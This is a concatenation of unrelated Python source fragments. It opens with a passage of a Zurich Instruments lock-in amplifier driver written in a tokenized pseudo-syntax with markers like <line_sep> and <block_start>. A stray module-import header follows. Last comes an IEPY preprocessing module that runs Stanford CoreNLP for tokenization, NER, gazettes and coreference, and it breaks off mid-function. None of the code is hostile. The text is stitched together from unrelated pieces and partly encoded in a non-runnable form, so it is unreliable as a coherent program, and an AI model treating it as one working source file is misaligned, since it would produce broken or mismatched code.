generic parameters. Note that some parameters use more specialised setter/getters. The module (e.g demodulator, input, output,..) number is counted in a zero indexed fashion. Args: module (str): The module (eg. demodulator, input, output, ..) we want to know the value of. number (int): Module's index mode (int): Indicating whether we are asking for an int or double. 0: Int, 1: double, 2: Sample setting (str): The module's setting to set. 
returns: inquered value """<line_sep>querystr=f'/{self.device}/{module}/{number}/{setting}'<line_sep>log.debug("getting %s" querystr)<if_stmt>mode<eq>0<block_start>value=self.daq.getInt(querystr)<block_end><elif_stmt>mode<eq>1<block_start>value=self.daq.getDouble(querystr)<block_end><elif_stmt>mode<eq>2<block_start>value=self.daq.getSample(querystr)<block_end><else_stmt><block_start><raise>RuntimeError("Invalid mode supplied")<block_end># Weird exception, samplingrate returns a string <return>value<block_end><def_stmt>_get_demod_sample self number:int demod_param:str<arrow>float<block_start>log.debug("getting demod %s param %s" number demod_param)<line_sep>mode=2<line_sep>module='demods'<line_sep>setting='sample'<if_stmt>demod_param<not><in>['x' 'y' 'R' 'phi']<block_start><raise>RuntimeError("Invalid demodulator parameter")<block_end>datadict=cast(Dict[Any Any] self._getter(module number mode setting))<line_sep>datadict['R']=np.abs(datadict['x']+1j<times>datadict['y'])<line_sep>datadict['phi']=np.angle(datadict['x']+1j<times>datadict['y'] deg=<true>)<line_sep><return>datadict[demod_param]<block_end><def_stmt>_sigout_setter self number:int mode:int setting:str value:Union[int float] output_mode:Optional[int]=<none><arrow><none><block_start>""" Function to set signal output's settings. A specific setter function is needed as parameters depend on each other and need to be checked and updated accordingly. Args: number: The output channel to use. Either 1 or 2. mode: Indicating whether we are asking for an int (0) or double (1). setting: The module's setting to set. value: The value to set the setting to. 
output_mode: Some options may take an extra int to indicate which of the 8 demodulators this acts on """<line_sep># convenient reference params=self.parameters<line_sep>amp_val_dict={'Vpk':<lambda>value:value 'Vrms':<lambda>value:value<times>sqrt(2) 'dBm':<lambda>value:10<power>((value-10)/20)}<def_stmt>amp_valid number value<block_start>ampdef_val=params[f"signal_output{number+1}_ampdef"].get()<line_sep>autorange_val=params[f"signal_output{number+1}_autorange"].get()<if_stmt>autorange_val<eq>"ON"<block_start>imp50_val=params[f"signal_output{number+1}_imp50"].get()<line_sep>imp50_dic={"OFF":1.5 "ON":0.75}<line_sep>range_val=imp50_dic[imp50_val]<block_end><else_stmt><block_start>so_range=params[f"signal_output{number+1}_range"].get()<line_sep>range_val=round(so_range 3)<block_end>converter=amp_val_dict[ampdef_val]<if_stmt>-range_val<l>amp_val_dict[ampdef_val](value)<g>range_val<block_start><raise>ValueError('Signal Output:'+' Amplitude {} {} too high for chosen range.'.format(value converter(value)))<block_end><block_end><def_stmt>offset_valid number value<block_start><def_stmt>validate_against_individual value amp_val range_val<block_start>amp_val=round(amp_val 3)<if_stmt>-range_val<l>value+amp_val<g>range_val<block_start><raise>ValueError('Signal Output: Offset too high for '<concat>'chosen range.')<block_end><block_end>range_val=params[f"signal_output{number+1}_range"].get()<line_sep>range_val=round(range_val 3)<if_stmt>'MF'<in>self.props['options']<block_start><for_stmt>i range(1 9)<block_start>amp_val=params[f"signal_output{number+1}_amplitude{i}"].get()<line_sep>validate_against_individual(value amp_val range_val)<block_end><block_end><else_stmt><block_start>amp_val=params[f"signal_output{number+1}_amplitude"].get()<line_sep>validate_against_individual(value amp_val range_val)<block_end><block_end><def_stmt>range_valid number 
value<block_start>autorange_val=params[f"signal_output{number+1}_autorange"].get()<line_sep>imp50_val=params[f"signal_output{number+1}_imp50"].get()<line_sep>imp50_dic={"OFF":[1.5 0.15] "ON":[0.75 0.075]}<if_stmt>autorange_val<eq>"ON"<block_start><raise>ValueError('Signal Output :'<concat>' Cannot set range as autorange is turned on.')<block_end><if_stmt>value<not><in>imp50_dic[imp50_val]<block_start><raise>ValueError('Signal Output: Choose a valid range:'<concat>'[0.75, 0.075] if imp50 is on, [1.5, 0.15]'<concat>' otherwise.')<block_end><block_end><def_stmt>ampdef_valid number value# check which amplitude definition you can use. # dBm is only possible with 50 Ohm imp ON <block_start>imp50_val=params[f"signal_output{number+1}_imp50"].get()<line_sep>imp50_ampdef_dict={"ON":["Vpk" "Vrms" "dBm"] "OFF":["Vpk" "Vrms"]}<if_stmt>value<not><in>imp50_ampdef_dict[imp50_val]<block_start><raise>ValueError("Signal Output: Choose a valid amplitude "<concat>"definition; ['Vpk','Vrms', 'dBm'] if imp50 is"<concat>" on, ['Vpk','Vrms'] otherwise.")<block_end><block_end>dynamic_validation={'range':range_valid 'ampdef':ampdef_valid 'amplitudes':amp_valid 'offset':offset_valid}<def_stmt>update_range_offset_amp <block_start>range_val=params[f"signal_output{number+1}_range"].get()<line_sep>offset_val=params[f"signal_output{number+1}_offset"].get()<if_stmt>"MF"<in>self.props["options"]<block_start>amps_val=[params[f"signal_output{number+1}_amplitude{output}"].get()<for>output range(1 9)]<block_end><else_stmt><block_start>amps_val=[params['signal_output{}_amplitude'.format(number+1)].get()]<block_end><for_stmt>amp_val amps_val<block_start><if_stmt>-range_val<l>offset_val+amp_val<g>range_val# The GUI would allow higher values but it would clip the signal. 
<block_start><raise>ValueError('Signal Output: Amplitude and/or '<concat>'offset out of range.')<block_end><block_end><block_end><def_stmt>update_offset <block_start>self.parameters[f"signal_output{number+1}_offset"].get()<block_end><def_stmt>update_amp <block_start><if_stmt>"MF"<in>self.props["options"]<block_start><for_stmt>i range(1 9)<block_start>self.parameters[f"signal_output{number+1}_amplitude{i}"].get()<block_end><block_end><else_stmt><block_start>self.parameters[f"signal_output{number+1}_amplitude"].get()<block_end><block_end><def_stmt>update_range <block_start>self.parameters[f"signal_output{number+1}_autorange"].get()<block_end># parameters which will potentially change other parameters changing_param={'imp50':[update_range_offset_amp update_range] 'autorange':[update_range] 'range':[update_offset update_amp] 'amplitudes':[update_range update_amp] 'offset':[update_range]}<line_sep>setstr=f'/{self.device}/sigouts/{number}/{setting}'<if_stmt>output_mode<is><not><none><block_start>setstr<augadd>f'/{output_mode}'<block_end><if_stmt>setting<in>dynamic_validation<block_start>dynamic_validation[setting](number value)<block_end><if_stmt>mode<eq>0<block_start>self.daq.setInt(setstr value)<block_end><elif_stmt>mode<eq>1<block_start>self.daq.setDouble(setstr value)<block_end><else_stmt><block_start><raise>RuntimeError("Invalid mode supplied")<block_end><if_stmt>setting<in>changing_param<block_start>[f()<for>f changing_param[setting]]<block_end><block_end><def_stmt>_sigout_getter self number:int mode:int setting:str output_mode:Optional[int]=<none><arrow>Union[int float]<block_start>""" Function to query the settings of signal outputs. Specific setter function is needed as parameters depend on each other and need to be checked and updated accordingly. Args: number: mode: Indicating whether we are asking for an int (0) or double (1). setting: The module's setting to set. 
output_mode: Some options may take an extra int to indicate which of the 8 demodulators this acts on """<line_sep>querystr=f'/{self.device}/sigouts/{number}/{setting}'<if_stmt>output_mode<is><not><none><block_start>querystr<augadd>f'/{output_mode}'<block_end><if_stmt>mode<eq>0<block_start>value=self.daq.getInt(querystr)<block_end><elif_stmt>mode<eq>1<block_start>value=self.daq.getDouble(querystr)<block_end><else_stmt><block_start><raise>RuntimeError("Invalid mode supplied")<block_end><return>value<block_end><def_stmt>_list_nodes self node<block_start>""" Returns a list with all nodes in the sub-tree below the specified node. Args: node (str): Module of which you want to know the parameters. return: list of sub-nodes """<line_sep>node_list=self.daq.getList(f'/{self.device}/{node}/')<line_sep><return>node_list<block_end>@staticmethod<def_stmt>NEPBW_to_timeconstant NEPBW order<block_start>""" Helper function to translate a NEP BW and a filter order to a filter time constant. Meant to be used when calculating sweeper sweep times. Note: precise only to within a few percent. Args: NEPBW (float): The NEP bandwidth in Hz order (int): The filter order Returns: float: The filter time constant in s. """<line_sep>const={1:0.249 2:0.124 3:0.093 4:0.078 5:0.068 6:0.061 7:0.056 8:0.052}<line_sep>tau_c=const[order]/NEPBW<line_sep><return>tau_c<block_end><def_stmt>_get_sweep_time self<block_start>""" get_cmd for the sweeper_sweeptime parameter. Note: this calculation is only an estimate and not precise to more than a few percent. Returns: Union[float, None]: None if the bandwidthcontrol setting is 'auto' (then all bets are off), otherwise a time in seconds. Raises: ValueError: if no signals are added to the sweep """<line_sep># Possible TODO: cut down on the number of instrument # queries. <if_stmt>self._sweeper_signals<eq>[]<block_start><raise>ValueError('No signals selected! 
Can not find sweep time.')<block_end>mode=self.sweeper_BWmode.get()<line_sep># The effective time constant of the demodulator depends on the # sweeper/bandwidthcontrol setting. # # If this setting is 'current', the largest current # time constant of the involved demodulators is used # # If the setting is 'fixed', the NEP BW specified under # sweep/bandwidth is used. The filter order is needed to convert # the NEP BW to a time constant demods={sig.split('/')[3]<for>sig self._sweeper_signals}<line_sep>rates=[]<for_stmt>demod demods<block_start>rates.append(self._getter('demods' demod 1 'rate'))<block_end>rate=min(rates)<if_stmt>mode<eq>'current'<block_start>tcs=[]<for_stmt>demod demods<block_start>tcs.append(self._getter('demods' demod 1 'timeconstant'))<block_end>tau_c=max(tcs)<block_end><elif_stmt>mode<eq>'fixed'<block_start>order=self.sweeper_order()<line_sep>BW=self.sweeper_BW()<line_sep>tau_c=self.NEPBW_to_timeconstant(BW order)<block_end><elif_stmt>mode<eq>'auto'<block_start><return><none><block_end>settlingtime=max(self.sweeper_settlingtc.get()<times>tau_c self.sweeper_settlingtime.get())<line_sep>averagingtime=max(self.sweeper_averaging_time.get()<times>tau_c<times>rate self.sweeper_averaging_samples.get())/rate<line_sep>time_est=(settlingtime+averagingtime)<times>self.sweeper_samplecount.get()<line_sep><return>time_est<block_end><def_stmt>_sweep_setter self setting value<block_start>""" set_cmd for all sweeper parameters. The value and setting are saved in a dictionary which is read by the Sweep parameter's build_sweep method and only then sent to the instrument. """<line_sep>key='/'.join(setting.split('/')[1:])<line_sep>self._sweepdict[key]=value<line_sep>self.sweep_correctly_built=<false><block_end><def_stmt>_sweep_getter self setting<block_start>""" General get_cmd for sweeper parameters The built-in sweeper.get command returns a dictionary, but we want single values. Args: setting (str): the path used by ZI to describe the setting, e.g. 
'sweep/settling/time' """<line_sep># TODO: Should this look up in _sweepdict rather than query the # instrument? returndict=self.sweeper.get(setting)# this is a dict # The dict may have different 'depths' depending on the parameter. # The depth is encoded in the setting string (number of '/') keys=setting.split('/')[1:]<while_stmt>keys<ne>[]<block_start>key=keys.pop(0)<line_sep>returndict=returndict[key]<block_end>rawvalue=returndict<if_stmt>isinstance(rawvalue np.ndarray)<and>len(rawvalue)<eq>1<block_start>value=rawvalue[0]<block_end><elif_stmt>isinstance(rawvalue list)<and>len(rawvalue)<eq>1<block_start>value=rawvalue[0]<block_end><else_stmt><block_start>value=rawvalue<block_end><return>value<block_end><def_stmt>add_signal_to_sweeper self demodulator attribute<block_start>""" Add a signal to the output of the sweeper. When the sweeper sweeps, the signals added to the sweeper are returned. Args: demodulator (int): A number from 1-8 choosing the demodulator. The same demodulator can be chosen several times for different attributes, e.g. demod1 X, demod1 phase attribute (str): The attribute to record, e.g. phase or Y Raises: ValueError: if a demodulator outside the allowed range is selected ValueError: if an attribute not in the list of allowed attributes is selected """<line_sep># TODO: implement all possibly returned attributes valid_attributes=['X' 'Y' 'R' 'phase' 'Xrms' 'Yrms' 'Rrms']<line_sep># Validation <if_stmt>demodulator<not><in>range(1 9)<block_start><raise>ValueError('Can not select demodulator'+f' {demodulator}. Only '+'demodulators 1-8 are available.')<block_end><if_stmt>attribute<not><in>valid_attributes<block_start><raise>ValueError('Can not select attribute:'+'{}. Only the following attributes are'+' available: '+('{}, '<times>len(valid_attributes)).format(*valid_attributes))<block_end># internally, we use strings very similar to the ones used by the # instrument, but with the attribute added, e.g. 
# '/dev2189/demods/0/sample/X' means X of demodulator 1. signalstring=('/'+self.device+'/demods/{}/sample/{}'.format(demodulator-1 attribute))<if_stmt>signalstring<not><in>self._sweeper_signals<block_start>self._sweeper_signals.append(signalstring)<block_end><block_end><def_stmt>remove_signal_from_sweeper self demodulator attribute<block_start>""" Remove a signal from the output of the sweeper. If the signal has not previously been added, a warning is logged. Args: demodulator (int): A number from 1-8 choosing the demodulator. The same demodulator can be chosen several times for different attributes, e.g. demod1 X, demod1 phase attribute (str): The attribute to record, e.g. phase or Y """<line_sep>signalstring=('/'+self.device+'/demods/{}/sample/{}'.format(demodulator-1 attribute))<if_stmt>signalstring<not><in>self._sweeper_signals<block_start>log.warning(f'Can not remove signal with {attribute} of'+f' demodulator {demodulator}, since it was'+' not previously added.')<block_end><else_stmt><block_start>self._sweeper_signals.remove(signalstring)<block_end><block_end><def_stmt>print_sweeper_settings self<block_start>""" Pretty-print the current settings of the sweeper. If Sweep.build_sweep and Sweep.get are called, the sweep described here will be performed. 
"""<line_sep>print('ACQUISITION')<line_sep>toprint=['sweeper_BWmode' 'sweeper_BW' 'sweeper_order' 'sweeper_averaging_samples' 'sweeper_averaging_time' 'sweeper_settlingtime' 'sweeper_settlingtc']<for_stmt>paramname toprint<block_start>parameter=self.parameters[paramname]<line_sep>print(' {}: {} ({})'.format(parameter.label parameter.get() parameter.unit))<block_end>print('HORISONTAL')<line_sep>toprint=['sweeper_start' 'sweeper_stop' 'sweeper_units' 'sweeper_samplecount' 'sweeper_param' 'sweeper_mode' 'sweeper_timeout']<for_stmt>paramname toprint<block_start>parameter=self.parameters[paramname]<line_sep>print(f' {parameter.label}: {parameter.get()}')<block_end>print('VERTICAL')<line_sep>count=1<for_stmt>signal self._sweeper_signals<block_start>(_ _ _ dm _ attr)=signal.split('/')<line_sep>fmt=(count int(dm)+1 attr)<line_sep>print(' Signal {}: Demodulator {}: {}'.format(*fmt))<line_sep>count<augadd>1<block_end>features=['timeconstant' 'order' 'samplerate']<line_sep>print('DEMODULATORS')<line_sep>demods=[]<for_stmt>signal self._sweeper_signals<block_start>demods.append(int(signal.split('/')[3]))<block_end>demods=set(demods)<for_stmt>dm demods<block_start><for_stmt>feat features<block_start>parameter=self.parameters[f"demod{dm+1:d}_{feat}"]<line_sep>fmt=(dm+1 parameter.label parameter.get() parameter.unit)<line_sep>print(" Demodulator {}: {}: {:.6f} ({})".format(*fmt))<block_end><block_end>print("META")<line_sep>swptime=self.sweeper_sweeptime()<if_stmt>swptime<is><not><none><block_start>print(f' Expected sweep time: {swptime:.1f} (s)')<block_end><else_stmt><block_start>print(' Expected sweep time: N/A in auto mode')<block_end>print(' Sweep timeout: {} ({})'.format(self.sweeper_timeout.get() 's'))<line_sep>ready=self.sweep_correctly_built<line_sep>print(f' Sweep built and ready to execute: {ready}')<block_end><def_stmt>_scope_setter self scopemodule mode setting value<block_start>""" set_cmd for all scope parameters. 
The value and setting are saved in a dictionary which is read by the Scope parameter's build_scope method and only then sent to the instrument. Args: scopemodule (int): Indicates whether this is a setting of the scopeModule or not. 1: it is a scopeModule setting, 0: it is not. mode (int): Indicates whether we are setting an int or a float. 0: int, 1: float. NOTE: Ignored if scopemodule==1. setting (str): The setting, e.g. 'length'. value (Union[int, float, str]): The value to set. """<line_sep># Because setpoints need to be built self.scope_correctly_built=<false><line_sep># Some parameters are linked to each other in specific ways # Therefore, we need special actions for setting these parameters SRtranslation={'kHz':1e3 'MHz':1e6 'GHz':1e9 'khz':1e3 'Mhz':1e6 'Ghz':1e9}<def_stmt>setlength value# TODO: add validation. The GUI seems to correect this value <block_start>self.daq.setDouble(f'/{self.device}/scopes/0/length' value)<line_sep>SR_str=self.parameters['scope_samplingrate'].get()<line_sep>(number unit)=SR_str.split(' ')<line_sep>SR=float(number)<times>SRtranslation[unit]<line_sep>self.parameters['scope_duration'].cache.set(value/SR)<line_sep>self.daq.setInt(f'/{self.device}/scopes/0/length' value)<block_end><def_stmt>setduration value# TODO: validation? 
<block_start>SR_str=self.parameters['scope_samplingrate'].get()<line_sep>(number unit)=SR_str.split(' ')<line_sep>SR=float(number)<times>SRtranslation[unit]<line_sep>N=int(np.round(value<times>SR))<line_sep>self.parameters['scope_length'].cache.set(N)<line_sep>self.parameters['scope_duration'].cache.set(value)<line_sep>self.daq.setInt(f'/{self.device}/scopes/0/length' N)<block_end><def_stmt>setholdoffseconds value<block_start>self.parameters['scope_trig_holdoffmode'].set('s')<line_sep>self.daq.setDouble(f'/{self.device}/scopes/0/trigholdoff' value)<block_end><def_stmt>setsamplingrate value# When the sample rate is changed, the number of points of the trace # remains unchanged and the duration changes accordingly <block_start>newSR_str=dict(zip(self._samplingrate_codes.values() self._samplingrate_codes.keys()))[value]<line_sep>(number unit)=newSR_str.split(' ')<line_sep>newSR=float(number)<times>SRtranslation[unit]<line_sep>oldSR_str=self.parameters['scope_samplingrate'].get()<line_sep>(number unit)=oldSR_str.split(' ')<line_sep>oldSR=float(number)<times>SRtranslation[unit]<line_sep>oldduration=self.parameters['scope_duration'].get()<line_sep>newduration=oldduration<times>oldSR/newSR<line_sep>self.parameters['scope_duration'].cache.set(newduration)<line_sep>self.daq.setInt(f'/{self.device}/scopes/0/time' value)<block_end>specialcases={'length':setlength 'duration':setduration 'scope_trig_holdoffseconds':setholdoffseconds 'time':setsamplingrate}<if_stmt>setting<in>specialcases<block_start>specialcases[setting](value)<line_sep>self.daq.sync()<line_sep><return><block_end><else_stmt># We have two different parameter types: those under # /scopes/0/ and those under scopeModule/ <block_start><if_stmt>scopemodule<block_start>self.scope.set(f'scopeModule/{setting}' value)<block_end><elif_stmt>mode<eq>0<block_start>self.daq.setInt('/{}/scopes/0/{}'.format(self.device setting) 
value)<block_end><elif_stmt>mode<eq>1<block_start>self.daq.setDouble('/{}/scopes/0/{}'.format(self.device setting) value)<block_end><return><block_end><block_end><def_stmt>_scope_getter self setting<block_start>""" get_cmd for scopeModule parameters """<line_sep># There are a few special cases SRtranslation={'kHz':1e3 'MHz':1e6 'GHz':1e9 'khz':1e3 'Mhz':1e6 'Ghz':1e9}<def_stmt>getduration <block_start>SR_str=self.parameters['scope_samplingrate'].get()<line_sep>(number unit)=SR_str.split(' ')<line_sep>SR=float(number)<times>SRtranslation[unit]<line_sep>N=self.parameters['scope_length'].get()<line_sep>duration=N/SR<line_sep><return>duration<block_end>specialcases={'duration':getduration}<if_stmt>setting<in>specialcases<block_start>value=specialcases[setting]()<block_end><else_stmt><block_start>querystr='scopeModule/'+setting<line_sep>returndict=self.scope.get(querystr)<line_sep># The dict may have different 'depths' depending on the parameter. # The depth is encoded in the setting string (number of '/') keys=setting.split('/')<while_stmt>keys<ne>[]<block_start>key=keys.pop(0)<line_sep>returndict=returndict[key]<line_sep>rawvalue=returndict<block_end><if_stmt>isinstance(rawvalue np.ndarray)<and>len(rawvalue)<eq>1<block_start>value=rawvalue[0]<block_end><elif_stmt>isinstance(rawvalue list)<and>len(rawvalue)<eq>1<block_start>value=rawvalue[0]<block_end><else_stmt><block_start>value=rawvalue<block_end><block_end><return>value<block_end>@staticmethod<def_stmt>_convert_to_float frequency<block_start>converter={'hz':'e0' 'khz':'e3' 'mhz':'e6' 'ghz':'e9' 'thz':'e12'}<line_sep>value,suffix=frequency.split(' ')<line_sep><return>float(''.join([value converter[suffix.lower()]]))<block_end><def_stmt>round_to_nearest_sampling_frequency self desired_sampling_rate<block_start>available_frequencies=[1.8e9/2<power>self._samplingrate_codes[freq]<for>freq self._samplingrate_codes.keys()]<line_sep>nearest_frequency=min(available_frequencies 
key=<lambda>f:abs(math.log(desired_sampling_rate 2)-math.log(f 2)))<line_sep><return>nearest_frequency<block_end><def_stmt>_set_samplingrate_as_float self frequency<block_start>float_samplingrate_map={1.8e9/2<power>v:k<for>k,v self._samplingrate_codes.items()}<line_sep>frequency_as_string=float_samplingrate_map[frequency]<line_sep>self.scope_samplingrate(frequency_as_string)<block_end><def_stmt>_get_samplingrate_as_float self<block_start>frequency=self.scope_samplingrate()<line_sep>correct_frequency=1.8e9/2<power>self._samplingrate_codes[frequency]<line_sep><return>correct_frequency<block_end><def_stmt>close self<block_start>""" Override of the base class' close function """<line_sep>self.scope.unsubscribe(f'/{self.device}/scopes/0/wave')<line_sep>self.scope.clear()<line_sep>self.sweeper.clear()<line_sep>self.daq.disconnect()<line_sep>super().close()<block_end><block_end>
# flake8: noqa: F401 <import_from_stmt>auth *<import_from_stmt>link *<import_from_stmt>misc *<import_from_stmt>user *<line_sep>
from collections import defaultdict
from itertools import chain, groupby
import logging
import tempfile

from iepy.preprocess import corenlp
from iepy.preprocess.pipeline import BasePreProcessStepRunner, PreProcessSteps
from iepy.preprocess.ner.base import FoundEntity
from iepy.data.models import EntityOccurrence, GazetteItem

logger = logging.getLogger(__name__)


class CoreferenceError(Exception):
    """Raised when coreference information cannot be applied to a document
    (e.g. a merge is attempted on entities of different kinds)."""
    pass


class GazetteManager:
    """Builds and tracks the gazette definitions handed to Stanford CoreNLP."""

    # Prefix used to mark entity kinds that are NOT native Stanford classes.
    _PREFIX = "__GAZETTE_"

    # Stanford NER default/native classes
    NATIVE_CLASSES = [
        'DATE', 'DURATION', 'LOCATION', 'MISC', 'MONEY', 'NUMBER', 'ORDINAL',
        'ORGANIZATION', 'PERCENT', 'PERSON', 'SET', 'TIME',
    ]

    def __init__(self):
        self.gazette_items = list(GazetteItem.objects.all())
        # kind name -> list of gazette texts declared with that (native) kind
        self._cache_per_kind = defaultdict(list)

    def escape_text(self, text):
        """Wrap each whitespace-separated token in \\Q...\\E so Stanford's
        regex engine treats it literally."""
        # Raw string: the backslashes are regex quoting markers, not escapes.
        text = " ".join(r"\Q{}\E".format(x) for x in text.split())
        return text

    def strip_kind(self, prefixed_kind):
        """Return the kind name with the gazette prefix (if any) removed."""
        return prefixed_kind.split(self._PREFIX, 1)[-1]

    def was_entry_created_by_gazette(self, alias, kind):
        """True if an entity occurrence (alias, kind) originated from a
        gazette entry rather than plain NER."""
        if kind.startswith(self._PREFIX):
            return True
        return alias in self._cache_per_kind[kind]

    def generate_stanford_gazettes_file(self):
        """
        Generate the gazettes file, if there are any gazette items.

        Returns:
            The filepath in case gazette items were found, else None.

        Note: the Stanford Coreference annotator only handles Entities of
        its native classes. That's why there's some special management of
        Gazette items of such classes/kinds.

        As a side effect, populates the internal cache with the
        gazette-items that will be passed to Stanford with any of their
        native classes (Entity Kinds).
        """
        if not self.gazette_items:
            return

        overridable_classes = ",".join(self.NATIVE_CLASSES)
        self._cache_per_kind = defaultdict(list)
        gazette_format = "{}\t{}\t{}\n"
        _, filepath = tempfile.mkstemp()
        with open(filepath, "w") as gazette_file:
            for gazette in self.gazette_items:
                kname = gazette.kind.name
                if kname in self.NATIVE_CLASSES:
                    # kind will not be escaped, but tokens will be stored on cache
                    self._cache_per_kind[kname].append(gazette.text)
                else:
                    kname = "{}{}".format(self._PREFIX, kname)
                text = self.escape_text(gazette.text)
                line = gazette_format.format(text, kname, overridable_classes)
                gazette_file.write(line)
        return filepath


class StanfordPreprocess(BasePreProcessStepRunner):
    """Runs the full IEPY preprocess pipeline through Stanford CoreNLP."""

    def __init__(self, increment_ner=False):
        super().__init__()
        self.gazette_manager = GazetteManager()
        gazettes_filepath = self.gazette_manager.generate_stanford_gazettes_file()
        self.corenlp = corenlp.get_analizer(gazettes_filepath=gazettes_filepath)
        self.override = False
        self.increment_ner = increment_ner

    def lemmatization_only(self, document):
        """Run only the lemmatization step on an otherwise-processed document."""
        # Lemmatization was added after the first release, so we need to
        # support documents that have all the steps done but lemmatization.
        analysis = StanfordAnalysis(self.corenlp.analyse(document.text))

        # Tokens must be unchanged, otherwise lemma offsets would not align.
        tokens = analysis.get_tokens()
        if document.tokens != tokens:
            raise ValueError(
                "Document changed since last tokenization, "
                "can't add lemmas to it")
        document.set_lemmatization_result(analysis.get_lemmas())
        document.save()

    def syntactic_parsing_only(self, document):
        """Run only the syntactic parsing step."""
        # Syntactic parsing was added after the first release, so we need to
        # provide the ability of doing just this on documents that have all
        # the steps done but syntactic parsing.
        analysis = StanfordAnalysis(self.corenlp.analyse(document.text))
        parse_trees = analysis.get_parse_trees()
        document.set_syntactic_parsing_result(parse_trees)
        document.save()

    def increment_ner_only(self, document):
        """Run the NER steps (basic NER and also gazetter), adding the newly
        found named entities, followed by coreference resolution."""
        analysis = StanfordAnalysis(self.corenlp.analyse(document.text))

        # NER
        found_entities = analysis.get_found_entities(
            document.human_identifier, self.gazette_manager
        )
        document.set_ner_result(found_entities)

        # Save progress so far, next step doesn't modify `document`
        document.save()

        # Coreference resolution (best-effort: failures are logged, not fatal)
        for coref in analysis.get_coreferences():
            try:
                apply_coreferences(document, coref)
            except CoreferenceError as e:
                logger.warning(e)

    def __call__(self, document):
        """Check the state of the document and, based on the preprocess
        options, decide what needs to be run and trigger it."""
        steps = [
            PreProcessSteps.tokenization,
            PreProcessSteps.sentencer,
            PreProcessSteps.tagging,
            PreProcessSteps.ner,
            # Steps added after 0.9.1
            PreProcessSteps.lemmatization,
            # Steps added after 0.9.2
            PreProcessSteps.syntactic_parsing,
        ]
        steps_done = {s for s in steps if document.was_preprocess_step_done(s)}

        if self.override or not steps_done:
            # No matter what's the internal state of the document, or any
            # other option on the StanfordPreprocess, everything needs to run.
            self.run_everything(document)
        elif steps_done == set(steps):
            # All steps are already done...
            if self.increment_ner:
                self.increment_ner_only(document)
        else:
            # Dealing with accepting "incremental-running" of preprocess for
            # documents that were preprocessed with some older version of
            # IEPY. "initial_steps" are the ones added up to version 0.9.1,
            # which (at some point) were considered "all available steps".
            initial_steps = steps[:4]
            all_initials_done = set(initial_steps).issubset(steps_done)
            if all_initials_done:
                if PreProcessSteps.lemmatization not in steps_done:
                    self.lemmatization_only(document)
                if PreProcessSteps.syntactic_parsing not in steps_done:
                    self.syntactic_parsing_only(document)
            else:
                # Weird combination of steps done. We can't handle that right now.
                raise NotImplementedError(
                    "Running with mixed preprocess steps not supported, "
                    "must be 100% StanfordMultiStepRunner")

    def run_everything(self, document):
        """Run every preprocess step from scratch on `document`."""
        analysis = StanfordAnalysis(self.corenlp.analyse(document.text))

        # Tokenization
        tokens = analysis.get_tokens()
        offsets = analysis.get_token_offsets()
        document.set_tokenization_result(list(zip(offsets, tokens)))

        # Lemmatization
        document.set_lemmatization_result(analysis.get_lemmas())

        # "Sentencing" (splitting in sentences)
        document.set_sentencer_result(analysis.get_sentence_boundaries())

        # POS tagging
        document.set_tagging_result(analysis.get_pos())

        # Syntactic parsing
        document.set_syntactic_parsing_result(analysis.get_parse_trees())

        # NER
        found_entities = analysis.get_found_entities(
            document.human_identifier, self.gazette_manager
        )
        document.set_ner_result(found_entities)

        # Save progress so far, next step doesn't modify `document`
        document.save()

        # Coreference resolution (best-effort: failures are logged, not fatal)
        for coref in analysis.get_coreferences():
            try:
                apply_coreferences(document, coref)
            except CoreferenceError as e:
                logger.warning(e)


def _dict_path(d, *steps):
    """Traverse through a dict of dicts.

    Always returns a list. If the object to return is not a list, it's
    encapsulated in one. If any of the path steps does not exist, an empty
    list is returned.
    """
    x = d
    for key in steps:
        try:
            x = x[key]
        except KeyError:
            return []
    if not isinstance(x, list):
        x = [x]
    return x


class StanfordAnalysis:
    """Helper for extracting the information from stanford corenlp output"""

    def __init__(self, data):
        self._data = data
        self.sentences = self.get_sentences()
        # All tokens of the document, in order, flattened across sentences.
        self._raw_tokens = list(chain.from_iterable(self.sentences))

    def _get(self, *args):
        return _dict_path(self._data, *args)

    def get_sentences(self):
        """Return a list of sentences, each a list of raw token dicts."""
        # Copy each token list so callers can't alias the parsed data.
        return [
            list(_dict_path(sentence, "tokens", "token"))
            for sentence in self._get("sentences", "sentence")
        ]

    def get_sentence_boundaries(self):
        """
        Returns a list with the offsets in tokens where each sentence starts,
        in order. The list contains one extra element at the end containing
        the total number of tokens.
        """
        ys = [0]
        for x in self.sentences:
            ys.append(ys[-1] + len(x))
        return ys

    def get_parse_trees(self):
        """Return the constituency parse string of each sentence."""
        return [x["parse"] for x in self._get("sentences", "sentence")]

    def get_tokens(self):
        return [x["word"] for x in self._raw_tokens]

    def get_lemmas(self):
        return [x["lemma"] for x in self._raw_tokens]

    def get_token_offsets(self):
        return [int(x["CharacterOffsetBegin"]) for x in self._raw_tokens]

    def get_pos(self):
        return [x["POS"] for x in self._raw_tokens]

    def get_found_entities(self, entity_key_prefix, gazette_manager=None):
        """
        Generates FoundEntity objects for the entities found.

        For all the entities that came from a gazette, joins the ones with
        the same kind (they share the alias as key, instead of a
        position-based key).
        """
        found_entities = []
        tokens = self.get_tokens()
        for i, j, kind in self.get_entity_occurrences():
            alias = " ".join(tokens[i:j])
            if gazette_manager is not None:
                from_gazette = gazette_manager.was_entry_created_by_gazette(
                    alias, kind)
            else:
                from_gazette = False

            if from_gazette:
                kind = gazette_manager.strip_kind(kind)
                key = alias
            else:
                key = "{} {} {} {}".format(entity_key_prefix, kind, i, j)

            found_entities.append(FoundEntity(
                key=key,
                kind_name=kind,
                alias=alias,
                offset=i,
                offset_end=j,
                from_gazette=from_gazette
            ))
        return found_entities

    def get_entity_occurrences(self):
        """
        Returns a list of tuples (i, j, kind) such that `i` is the start
        offset of an entity occurrence, `j` is the end offset and `kind` is
        the entity kind of the entity. Offsets are in tokens and relative to
        the start of the document.
        """
        found_entities = []
        offset = 0
        for words in self.sentences:
            # Group consecutive tokens carrying the same NER label.
            for kind, group in groupby(enumerate(words),
                                       key=lambda x: x[1]["NER"]):
                if kind == "O":
                    # "O" is Stanford's label for "not an entity".
                    continue
                ix = [i for i, word in group]
                i = ix[0] + offset
                j = ix[-1] + 1 + offset
                found_entities.append((i, j, kind))
            offset += len(words)
        return found_entities

    def get_coreferences(self):
        """
        Returns a list of lists of tuples (i, j, k) such that `i` is the
        start offset of a reference, `j` is the end offset and `k` is the
        index of the head word within the reference. All offsets are in
        tokens and relative to the start of the document.

        All references within the same list refer to the same entity.
        All references in different lists refer to different entities.
        """
        sentence_offsets = self.get_sentence_boundaries()
        coreferences = []
        for mention in self._get("coreference", "coreference"):
            occurrences = []
            representative = 0
